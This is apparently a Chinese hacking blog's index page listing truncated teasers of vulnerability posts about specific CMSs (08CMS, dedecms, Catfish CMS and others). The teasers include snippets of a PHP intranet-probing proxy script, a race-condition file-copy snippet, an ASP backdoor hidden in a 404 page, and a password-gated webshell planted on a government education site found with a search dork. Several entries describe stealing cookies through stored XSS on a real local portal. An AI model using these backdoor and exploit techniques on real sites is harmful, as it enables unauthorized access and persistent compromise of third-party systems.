1.存储型跨站:当时我在尝试渗透我们这的的地方门户,发现bbs有个调查问卷,我便随便插了个跨站代码,结果收到了cookie。 [php]
08CMS 变量覆盖导致getshell 等问题
我也是初学php 文章有什么不对的 还望各位指出错误 见谅 。。。 ========================================================...
前卫音乐多个漏洞
在阅读“前卫音乐V2.0BETA(20130709)版”代码过程中,发现多个漏洞。 1./home/libs/common.php注入漏洞 在/home目录里有index.php文...
无忧购物系统ASP专业版 SQL防注入绕过
from:90sec在果views.asp这个文件有问题,存在注入可以看到:hw_id=Request("hw_id") hw_id没有任何过滤,还是request请求,一看就鬼火...
php内网探测脚本&简单代理访问
<?php $url = isset($_REQUEST['u'])?$_REQUEST['u']:null; $ip = isset($_REQUEST['i'])?$_REQUEST['i'...
aacms最新注入一处
aacms最新注入一处 作者:mOon 博客:www.moonsec.com 扣扣 40497992 AD(代码审计师、漏洞挖掘师 )四月份结束 ,需要加入的请速度联系囖。木木达
竞争条件漏洞
<?php if($_REQUEST['file']){ copy($_REQUEST['file'],$_REQUEST['PATH']); } if($_REQUEST['file']){ ...
(首发)dedecms 5.7 最新漏洞(绝非网上公布的)
请看看文件:include/filter.inc.php 引用一哥话语: 这是2B的dede再次变量覆盖漏洞根源。。 这是过滤或替换非法关键字。正常的。 /* 对_GET,_POST,_COOKIE进...
dedecms利用xss+csrf getshell
最近确实很忙,很久不更新博客了。 dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修...
利用404错误页面隐藏后门
先找一个404错误页面 把源码复制下来保存到本地asp格式 <% if request("77169")="77169" then %> <title>77...
Catfish CMS两处任意文件操作
在/application/user/controller/Index.php中第93行: public function touxiang() { $this->check...
某政府教育网站0day
inurl:printpage.asp?ArticleID= 在后台版权信息栏里写入小马 if Request(“pass”)=”520″ then dim allen,creat,text,this...
21